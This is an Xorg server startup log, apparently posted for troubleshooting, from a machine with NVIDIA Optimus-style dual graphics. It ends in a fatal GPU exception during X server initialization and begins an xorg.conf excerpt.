] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 45.606 ] current version of pixman : 0.30.2 [ 45.606 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 45.606 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 45.606 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : fri apr 25 10:20:03 2014 [ 45.767 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 45.768 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 46.283 ] ( == ) serverlayout `` layout '' [ 46.283 ] ( ** ) | -- > screen `` nvidia '' ( 0 ) [ 46.283 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 46.284 ] ( ** ) | | -- > device `` nvidia '' [ 46.284 ] ( == ) no monitor specified for screen `` nvidia '' . using a default monitor configuration . [ 46.284 ] ( ** ) | -- > inactive device `` intel '' [ 46.284 ] ( == ) automatically adding devices [ 46.284 ] ( == ) automatically enabling devices [ 46.284 ] ( == ) automatically adding gpu devices [ 46.395 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 46.395 ] entry deleted from font path . [ 46.395 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 46.395 ] entry deleted from font path . [ 46.395 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 46.395 ] entry deleted from font path . [ 46.438 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 46.438 ] entry deleted from font path . [ 46.438 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 46.438 ] entry deleted from font path . [ 46.438 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 46.438 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 46.438 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 46.438 ] ( ii ) loader magic : 0x7f539332ed60 [ 46.438 ] ( ii ) module abi versions : [ 46.438 ] x.org ansi c emulation : 0.4 [ 46.438 ] x.org video driver : 15.0 [ 46.438 ] x.org xinput driver : 20.0 [ 46.439 ] x.org server extension : 8.0 [ 46.440 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card1 ) [ 46.440 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 46.447 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0116:144d : c0a5 rev 9 , mem @ 0xf5400000/4194304 , 0xc0000000/268435456 , i/o @ 0x0000e000/64 [ 46.447 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0df4:144d : c0a5 rev 161 , mem @ 0xf4000000/16777216 , 0xd0000000/268435456 , 0xe0000000/33554432 , i/o @ 0x0000d000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 46.491 ] initializing built-in extension generic event extension [ 46.491 ] initializing built-in extension shape [ 46.491 ] initializing built-in extension mit-shm [ 46.491 ] initializing built-in extension xinputextension [ 46.491 ] initializing built-in extension xtest [ 46.491 ] initializing built-in extension big-requests [ 46.491 ] initializing built-in extension sync [ 46.491 ] initializing built-in extension xkeyboard [ 46.492 ] initializing built-in extension xc-misc [ 46.492 ] initializing built-in extension security [ 46.492 ] initializing built-in extension xinerama [ 46.492 ] initializing built-in extension xfixes [ 46.492 ] initializing built-in extension render [ 46.492 ] initializing built-in extension randr [ 46.492 ] initializing built-in extension composite [ 46.492 ] initializing built-in extension damage [ 46.492 ] initializing built-in extension mit-screen-saver [ 46.492 ] initializing built-in extension double-buffer [ 46.492 ] initializing built-in extension record [ 46.492 ] initializing built-in extension dpms [ 46.492 ] initializing built-in extension present [ 46.492 ] initializing built-in extension dri3 [ 46.492 ] initializing built-in extension x-resource [ 46.493 ] initializing built-in extension xvideo [ 46.493 ] initializing built-in extension xvideo-motioncompensation [ 46.493 ] initializing built-in extension selinux [ 46.493 ] initializing built-in extension xfree86-vidmodeextension [ 46.493 ] initializing built-in extension xfree86-dga [ 46.493 ] initializing built-in extension xfree86-dri [ 46.493 ] initializing built-in extension dri2 [ 46.493 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 46.493 ] ( ii ) `` glx '' will be loaded by default . [ 46.493 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 46.493 ] ( ii ) loadmodule : `` glx '' [ 46.588 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 50.389 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 50.389 ] compiled for 4.0.2 , module version = 1.0.0 [ 50.389 ] module class : x.org server extension [ 50.390 ] ( ii ) nvidia glx module 331.67 fri apr 4 11:43:47 pdt 2014 [ 50.425 ] loading extension glx [ 50.425 ] ( ii ) loadmodule : `` nvidia '' [ 50.426 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 51.029 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 51.029 ] compiled for 4.0.2 , module version = 1.0.0 [ 51.029 ] module class : x.org video driver [ 51.112 ] ( ii ) loadmodule : `` modesetting '' [ 51.920 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 51.999 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 51.999 ] compiled for 1.15.0 , module version = 0.8.1 [ 51.999 ] module class : x.org video driver [ 51.999 ] abi class : x.org video driver , version 15.0 [ 51.999 ] ( ii ) nvidia dlloader x driver 331.67 fri apr 4 11:24:40 pdt 2014 [ 51.999 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 52.098 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 52.098 ] ( ++ ) using vt number 7 [ 52.130 ] ( ii ) loading sub module `` fb '' [ 52.130 ] ( ii ) loadmodule : `` fb '' [ 52.131 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 52.222 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 52.222 ] compiled for 1.15.1 , module version = 1.0.0 [ 52.222 ] abi class : x.org ansi c emulation , version 0.4 [ 52.222 ] ( ww ) unresolved symbol : fbgetgcprivatekey [ 52.222 ] ( ii ) loading sub module `` wfb '' [ 52.222 ] ( ii ) loadmodule : `` wfb '' [ 52.223 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 52.370 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 52.370 ] compiled for 1.15.1 , module version = 1.0.0 [ 52.370 ] abi class : x.org ansi c emulation , version 0.4 [ 52.371 ] ( ii ) loading sub module `` ramdac '' [ 52.371 ] ( ii ) loadmodule : `` ramdac '' [ 52.371 ] ( ii ) module `` ramdac '' already built-in [ 52.439 ] ( ii ) modesetting ( g0 ) : using drv /dev/dri/card0 [ 52.439 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section '' nvidia '' for depth/fbbpp 24/32 [ 52.439 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 52.440 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 52.440 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 52.440 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 52.445 ] ( ** ) nvidia ( 0 ) : option `` constraincursor '' `` off '' [ 52.446 ] ( ** ) nvidia ( 0 ) : option `` allowemptyinitialconfiguration '' `` on '' [ 52.446 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 53.888 ] ( ww ) nvidia ( 0 ) : unable to read edid for display device crt-0 [ 53.889 ] ( ii ) nvidia ( gpu-0 ) : found drm driver nvidia-drm ( 20130102 ) [ 53.891 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 540m ( gf108 ) at pci:1:0:0 ( gpu-0 ) [ 53.891 ] ( -- ) nvidia ( 0 ) : memory : 2097152 kbytes [ 53.891 ] ( -- ) nvidia ( 0 ) : videobios : 70.08.58.00.03 [ 53.891 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 53.891 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 540m at pci:1:0:0 [ 53.891 ] ( -- ) nvidia ( 0 ) : crt-0 ( boot , connected ) [ 53.891 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 53.891 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 53.891 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 53.891 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 53.894 ] ( == ) nvidia ( 0 ) : [ 53.894 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 53.894 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 53.894 ] ( == ) nvidia ( 0 ) : [ 53.894 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 53.894 ] ( ii ) nvidia ( 0 ) : `` crt-0 : nvidia-auto-select '' [ 53.894 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1024 x 768 [ 53.896 ] ( ww ) nvidia ( 0 ) : unable to get display device crt-0 's edid ; can not compute dpi [ 53.896 ] ( ww ) nvidia ( 0 ) : from crt-0 's edid . [ 53.896 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 53.896 ] ( == ) modesetting ( g0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 53.896 ] ( == ) modesetting ( g0 ) : rgb weight 888 [ 53.896 ] ( == ) modesetting ( g0 ) : default visual is truecolor [ 53.896 ] ( ii ) modesetting ( g0 ) : shadowfb : preferred yes , enabled yes [ 53.896 ] ( ii ) modesetting ( g0 ) : output lvds-1-0 has no monitor section [ 53.897 ] ( ii ) modesetting ( g0 ) : output vga-1-0 has no monitor section [ 53.948 ] ( ii ) modesetting ( g0 ) : output hdmi-1-0 has no monitor section [ 53.996 ] ( ii ) modesetting ( g0 ) : output displayport-1-0 has no monitor section [ 53.996 ] ( ii ) modesetting ( g0 ) : edid for output lvds-1-0 [ 53.996 ] ( ii ) modesetting ( g0 ) : manufacturer : sec model : 544b serial # : 0 [ 53.997 ] ( ii ) modesetting ( g0 ) : year : 2011 week : 0 [ 53.997 ] ( ii ) modesetting ( g0 ) : edid version : 1.3 [ 53.997 ] ( ii ) modesetting ( g0 ) : digital display input [ 53.997 ] ( ii ) modesetting ( g0 ) : max image size [ cm ] : horiz . : 38 vert . : 21 [ 53.997 ] ( ii ) modesetting ( g0 ) : gamma : 2.20 [ 53.997 ] ( ii ) modesetting ( g0 ) : no dpms capabilities specified [ 53.997 ] ( ii ) modesetting ( g0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 53.997 ] ( ii ) modesetting ( g0 ) : first detailed timing is preferred mode [ 53.997 ] ( ii ) modesetting ( g0 ) : redx : 0.600 redy : 0.340 greenx : 0.310 greeny : 0.560 [ 53.997 ] ( ii ) modesetting ( g0 ) : bluex : 0.150 bluey : 0.130 whitex : 0.313 whitey : 0.329 [ 53.997 ] ( ii ) modesetting ( g0 ) : manufacturer 's mask : 0 [ 53.997 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 53.997 ] ( ii ) modesetting ( g0 ) : clock : 107.8 mhz image size : 382 x 214 mm [ 53.997 ] ( ii ) modesetting ( g0 ) : h_active : 1600 h_sync : 1648 h_sync_end 1680 h_blank_end 1892 h_border : 0 [ 53.997 ] ( ii ) modesetting ( g0 ) : v_active : 900 v_sync : 902 v_sync_end 908 v_blanking : 950 v_border : 0 [ 53.997 ] ( ii ) modesetting ( g0 ) : unknown vendor-specific block f [ 53.997 ] ( ii ) modesetting ( g0 ) : samsung [ 53.998 ] ( ii ) modesetting ( g0 ) : ltn173kt01c09 [ 53.998 ] ( ii ) modesetting ( g0 ) : edid ( in hex ) : [ 53.998 ] ( ii ) modesetting ( g0 ) : 00ffffffffffff004ca34b5400000000 [ 53.998 ] ( ii ) modesetting ( g0 ) : 00150103802615780a859599574f8f26 [ 53.998 ] ( ii ) modesetting ( g0 ) : 21505400000001010101010101010101 [ 53.998 ] ( ii ) modesetting ( g0 ) : 010101010101202a4024618432303020 [ 53.998 ] ( ii ) modesetting ( g0 ) : 26007ed6100000190000000f00000000 [ 53.998 ] ( ii ) modesetting ( g0 ) : 00000000001eb4027400000000fe0053 [ 53.998 ] ( ii ) modesetting ( g0 ) : 414d53554e470a2020202020000000fe [ 53.998 ] ( ii ) modesetting ( g0 ) : 004c544e3137334b5430314330390007 [ 53.999 ] ( ii ) modesetting ( g0 ) : printing probed modes for output lvds-1-0 ***********removed************ [ 54.002 ] ( ii ) modesetting ( g0 ) : edid for output vga-1-0 [ 54.052 ] ( ii ) modesetting ( g0 ) : edid for output hdmi-1-0 [ 54.052 ] ( ii ) modesetting ( g0 ) : manufacturer : sam model : 7d6 serial # : 808465465 [ 54.052 ] ( ii ) modesetting ( g0 ) : year : 2011 week : 48 [ 54.053 ] ( ii ) modesetting ( g0 ) : edid version : 1.3 [ 54.053 ] ( ii ) modesetting ( g0 ) : digital display input [ 54.053 ] ( ii ) modesetting ( g0 ) : max image size [ cm ] : horiz . : 53 vert . : 30 [ 54.053 ] ( ii ) modesetting ( g0 ) : gamma : 2.20 [ 54.053 ] ( ii ) modesetting ( g0 ) : dpms capabilities : off [ 54.053 ] ( ii ) modesetting ( g0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 54.053 ] ( ii ) modesetting ( g0 ) : first detailed timing is preferred mode [ 54.053 ] ( ii ) modesetting ( g0 ) : redx : 0.631 redy : 0.351 greenx : 0.334 greeny : 0.615 [ 54.053 ] ( ii ) modesetting ( g0 ) : bluex : 0.157 bluey : 0.051 whitex : 0.312 whitey : 0.329 [ 54.053 ] ( ii ) modesetting ( g0 ) : supported established timings : [ 54.053 ] ( ii ) modesetting ( g0 ) : 720x400 @ 70hz [ 54.053 ] ( ii ) modesetting ( g0 ) : 640x480 @ 60hz [ 54.053 ] ( ii ) modesetting ( g0 ) : 640x480 @ 67hz [ 54.053 ] ( ii ) modesetting ( g0 ) : 640x480 @ 72hz [ 54.053 ] ( ii ) modesetting ( g0 ) : 640x480 @ 75hz [ 54.053 ] ( ii ) modesetting ( g0 ) : 800x600 @ 56hz [ 54.053 ] ( ii ) modesetting ( g0 ) : 800x600 @ 60hz [ 54.053 ] ( ii ) modesetting ( g0 ) : 800x600 @ 72hz [ 54.054 ] ( ii ) modesetting ( g0 ) : 800x600 @ 75hz [ 54.054 ] ( ii ) modesetting ( g0 ) : 832x624 @ 75hz [ 54.054 ] ( ii ) modesetting ( g0 ) : 1024x768 @ 60hz [ 54.054 ] ( ii ) modesetting ( g0 ) : 1024x768 @ 70hz [ 54.054 ] ( ii ) modesetting ( g0 ) : 1024x768 @ 75hz [ 54.054 ] ( ii ) modesetting ( g0 ) : 1280x1024 @ 75hz [ 54.054 ] ( ii ) modesetting ( g0 ) : 1152x864 @ 75hz [ 54.054 ] ( ii ) modesetting ( g0 ) : manufacturer 's mask : 0 [ 54.054 ] ( ii ) modesetting ( g0 ) : supported standard timings : [ 54.054 ] ( ii ) modesetting ( g0 ) : # 0 : hsize : 1152 vsize 864 refresh : 75 vid : 20337 [ 54.054 ] ( ii ) modesetting ( g0 ) : # 1 : hsize : 1280 vsize 800 refresh : 60 vid : 129 [ 54.054 ] ( ii ) modesetting ( g0 ) : # 2 : hsize : 1280 vsize 960 refresh : 60 vid : 16513 [ 54.054 ] ( ii ) modesetting ( g0 ) : # 3 : hsize : 1280 vsize 1024 refresh : 60 vid : 32897 [ 54.054 ] ( ii ) modesetting ( g0 ) : # 4 : hsize : 1440 vsize 900 refresh : 60 vid : 149 [ 54.054 ] ( ii ) modesetting ( g0 ) : # 5 : hsize : 1440 vsize 900 refresh : 75 vid : 3989 [ 54.054 ] ( ii ) modesetting ( g0 ) : # 6 : hsize : 1600 vsize 1200 refresh : 60 vid : 16553 [ 54.054 ] ( ii ) modesetting ( g0 ) : # 7 : hsize : 1680 vsize 1050 refresh : 60 vid : 179 [ 54.054 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 54.054 ] ( ii ) modesetting ( g0 ) : clock : 148.5 mhz image size : 531 x 299 mm [ 54.054 ] ( ii ) modesetting ( g0 ) : h_active : 1920 h_sync : 2008 h_sync_end 2052 h_blank_end 2200 h_border : 0 [ 54.054 ] ( ii ) modesetting ( g0 ) : v_active : 1080 v_sync : 1084 v_sync_end 1089 v_blanking : 1125 v_border : 0 [ 54.055 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 54.055 ] ( ii ) modesetting ( g0 ) : clock : 74.2 mhz image size : 531 x 299 mm [ 54.055 ] ( ii ) modesetting ( g0 ) : h_active : 1280 h_sync : 1390 h_sync_end 1430 h_blank_end 1650 h_border : 0 [ 54.055 ] ( ii ) modesetting ( g0 ) : v_active : 720 v_sync : 725 v_sync_end 730 v_blanking : 750 v_border : 0 [ 54.055 ] ( ii ) modesetting ( g0 ) : ranges : v min : 50 v max : 75 hz , h min : 31 h max : 81 khz , pixclock max 175 mhz [ 54.055 ] ( ii ) modesetting ( g0 ) : monitor name : sa300/350/360 [ 54.055 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 54.055 ] ( ii ) modesetting ( g0 ) : clock : 74.2 mhz image size : 531 x 299 mm [ 54.055 ] ( ii ) modesetting ( g0 ) : h_active : 1920 h_sync : 2448 h_sync_end 2492 h_blank_end 2640 h_border : 0 [ 54.055 ] ( ii ) modesetting ( g0 ) : v_active : 540 v_sync : 542 v_sync_end 547 v_blanking : 562 v_border : 0 [ 54.055 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 54.055 ] ( ii ) modesetting ( g0 ) : clock : 74.2 mhz image size : 531 x 299 mm [ 54.055 ] ( ii ) modesetting ( g0 ) : h_active : 1920 h_sync : 2008 h_sync_end 2052 h_blank_end 2200 h_border : 0 [ 54.055 ] ( ii ) modesetting ( g0 ) : v_active : 540 v_sync : 542 v_sync_end 547 v_blanking : 562 v_border : 0 [ 54.055 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 54.055 ] ( ii ) modesetting ( g0 ) : clock : 74.2 mhz image size : 531 x 299 mm [ 54.056 ] ( ii ) modesetting ( g0 ) : h_active : 1280 h_sync : 1720 h_sync_end 1760 h_blank_end 1980 h_border : 0 [ 54.056 ] ( ii ) modesetting ( g0 ) : v_active : 720 v_sync : 725 v_sync_end 730 v_blanking : 750 v_border : 0 [ 54.056 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 54.056 ] ( ii ) modesetting ( g0 ) : clock : 27.0 mhz image size : 531 x 299 mm [ 54.056 ] ( ii ) modesetting ( g0 ) : h_active : 720 h_sync : 732 h_sync_end 796 h_blank_end 864 h_border : 0 [ 54.056 ] ( ii ) modesetting ( g0 ) : v_active : 576 v_sync : 581 v_sync_end 586 v_blanking : 625 v_border : 0 [ 54.056 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 54.056 ] ( ii ) modesetting ( g0 ) : clock : 27.0 mhz image size : 531 x 299 mm [ 54.056 ] ( ii ) modesetting ( g0 ) : h_active : 720 h_sync : 736 h_sync_end 798 h_blank_end 858 h_border : 0 [ 54.056 ] ( ii ) modesetting ( g0 ) : v_active : 480 v_sync : 489 v_sync_end 495 v_blanking : 525 v_border : 0 [ 54.056 ] ( ii ) modesetting ( g0 ) : number of edid sections to follow : 1 [ 54.056 ] ( ii ) modesetting ( g0 ) : edid ( in hex ) : [ 54.056 ] ( ii ) modesetting ( g0 ) : 00ffffffffffff004c2dd60739343030 [ 54.056 ] ( ii ) modesetting ( g0 ) : 3015010380351e782aba41a159559d28 [ 54.056 ] ( ii ) modesetting ( g0 ) : 0d5054bfef80714f8100814081809500 [ 54.056 ] ( ii ) modesetting ( g0 ) : 950fa940b300023a801871382d40582c [ 54.057 ] ( ii ) modesetting ( g0 ) : 4500132b2100001e011d007251d01e20 [ 54.057 ] ( ii ) modesetting ( g0 ) : 6e285500132b2100001e000000fd0032 [ 54.057 ] ( ii ) modesetting ( g0 ) : 4b1f5111000a202020202020000000fc [ 54.057 ] ( ii ) modesetting ( g0 ) : 0053413330302f3335302f3336300160 [ 54.057 ] ( ii ) modesetting ( g0 ) : 020313b14890041f051413120365030c [ 54.057 ] ( ii ) modesetting ( g0 ) : 001000011d80d0721c1620102c258013 [ 54.057 ] ( ii ) modesetting ( g0 ) : 2b2100009e011d8018711c1620582c25 [ 54.057 ] ( ii ) modesetting ( g0 ) : 00132b2100009e011d00bc52d01e20b8 [ 54.057 ] ( ii ) modesetting ( g0 ) : 285540132b2100001e8c0ad090204031 [ 54.057 ] ( ii ) modesetting ( g0 ) : 200c405500132b210000188c0ad08a20 [ 54.057 ] ( ii ) modesetting ( g0 ) : e02d10103e9600132b21000018000000 [ 54.057 ] ( ii ) modesetting ( g0 ) : 000000000000000000000000000000d5 [ 54.057 ] ( ii ) modesetting ( g0 ) : printing probed modes for output hdmi-1-0 [ 54.057 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080 '' x60.0 148.50 1920 2008 2052 2200 1080 1084 1089 1125 +hsync +vsync ( 67.5 khz ep ) [ 54.057 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080 '' x50.0 148.50 1920 2448 2492 2640 1080 1084 1089 1125 +hsync +vsync ( 56.2 khz e ) [ 54.057 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080 '' x59.9 148.35 1920 2008 2052 2200 1080 1084 1089 1125 +hsync +vsync ( 67.4 khz e ) [ 54.057 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080i '' x60.0 74.25 1920 2008 2052 2200 1080 1084 1094 1125 interlace +hsync +vsync ( 33.8 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080i '' x50.0 74.25 1920 2448 2492 2640 1080 1084 1094 1125 interlace +hsync +vsync ( 28.1 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080i '' x59.9 74.18 1920 2008 2052 2200 1080 1084 1094 1125 interlace +hsync +vsync ( 33.7 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1600x1200 '' x60.0 162.00 1600 1664 1856 2160 1200 1201 1204 1250 +hsync +vsync ( 75.0 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1680x1050 '' x59.9 119.00 1680 1728 1760 1840 1050 1053 1059 1080 +hsync -vsync ( 64.7 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x1024 '' x75.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1440x900 '' x75.0 136.75 1440 1536 1688 1936 900 903 909 942 -hsync +vsync ( 70.6 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1440x900 '' x59.9 88.75 1440 1488 1520 1600 900 903 909 926 +hsync -vsync ( 55.5 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x960 '' x60.0 108.00 1280 1376 1488 1800 960 961 964 1000 +hsync +vsync ( 60.0 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x800 '' x59.9 71.00 1280 1328 1360 1440 800 803 809 823 +hsync -vsync ( 49.3 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1152x864 '' x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x720 '' x60.0 74.25 1280 1390 1430 1650 720 725 730 750 +hsync +vsync ( 45.0 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x720 '' x50.0 74.25 1280 1720 1760 1980 720 725 730 750 +hsync +vsync ( 37.5 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x720 '' x59.9 74.18 1280 1390 1430 1650 720 725 730 750 +hsync +vsync ( 45.0 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x75.1 78.80 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.1 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x70.1 75.00 1024 1048 1184 1328 768 771 777 806 -hsync -vsync ( 56.5 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) [ 54.058 ] ( ii ) modesetting ( g0 ) : modeline `` 832x624 '' x74.6 57.28 832 864 928 1152 624 625 628 667 -hsync -vsync ( 49.7 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync ( 48.1 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 720x576 '' x50.0 27.00 720 732 796 864 576 581 586 625 -hsync -vsync ( 31.2 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 720x480 '' x60.0 27.03 720 736 798 858 480 489 495 525 -hsync -vsync ( 31.5 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 720x480 '' x59.9 27.00 720 736 798 858 480 489 495 525 -hsync -vsync ( 31.5 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x72.8 31.50 640 664 704 832 480 489 491 520 -hsync -vsync ( 37.9 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x66.7 30.24 640 704 768 864 480 483 486 525 -hsync -vsync ( 35.0 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x60.0 25.20 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 54.059 ] ( ii ) modesetting ( g0 ) : modeline `` 720x400 '' x70.1 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) [ 54.108 ] ( ii ) modesetting ( g0 ) : edid for output displayport-1-0 [ 54.108 ] ( ii ) modesetting ( g0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 54.108 ] ( == ) modesetting ( g0 ) : dpi set to ( 96 , 96 ) [ 54.108 ] ( ii ) loading sub module `` fb '' [ 54.108 ] ( ii ) loadmodule : `` fb '' [ 54.109 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 54.109 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 54.109 ] compiled for 1.15.1 , module version = 1.0.0 [ 54.109 ] abi class : x.org ansi c emulation , version 0.4 [ 54.109 ] ( ii ) loading sub module `` shadow '' [ 54.109 ] ( ii ) loadmodule : `` shadow '' [ 54.110 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 54.192 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 54.192 ] compiled for 1.15.1 , module version = 1.1.0 [ 54.192 ] abi class : x.org ansi c emulation , version 0.4 [ 54.192 ] ( -- ) depth 24 pixmap format is 32 bpp [ 54.285 ] ( == ) modesetting ( g0 ) : backing store enabled [ 54.286 ] ( == ) modesetting ( g0 ) : silken mouse enabled [ 54.286 ] ( ii ) modesetting ( g0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 54.288 ] ( == ) modesetting ( g0 ) : dpms enabled [ 54.288 ] ( ww ) modesetting ( g0 ) : option `` allowemptyinitialconfiguration '' is not used [ 54.921 ] ( ii ) nvidia : using 3072.00 mb of virtual memory for indirect memory [ 54.921 ] ( ii ) nvidia : access . [ 54.946 ] ( ii ) nvidia ( 0 ) : setting mode `` crt-0 : nvidia-auto-select '' [ 62.812 ] ( ee ) fatal server error : [ 62.812 ] ( ee ) nvidia : a gpu exception occurred during x server initialization ( ee ) [ 62.812 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 62.812 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 62.812 ] ( ee ) [ 63.200 ] ( ee ) server terminated with error ( 1 ) . closing log file . finally , here is the relevant xorg.conf generated by nvidia section `` serverlayout '' identifier `` layout '' screen 0 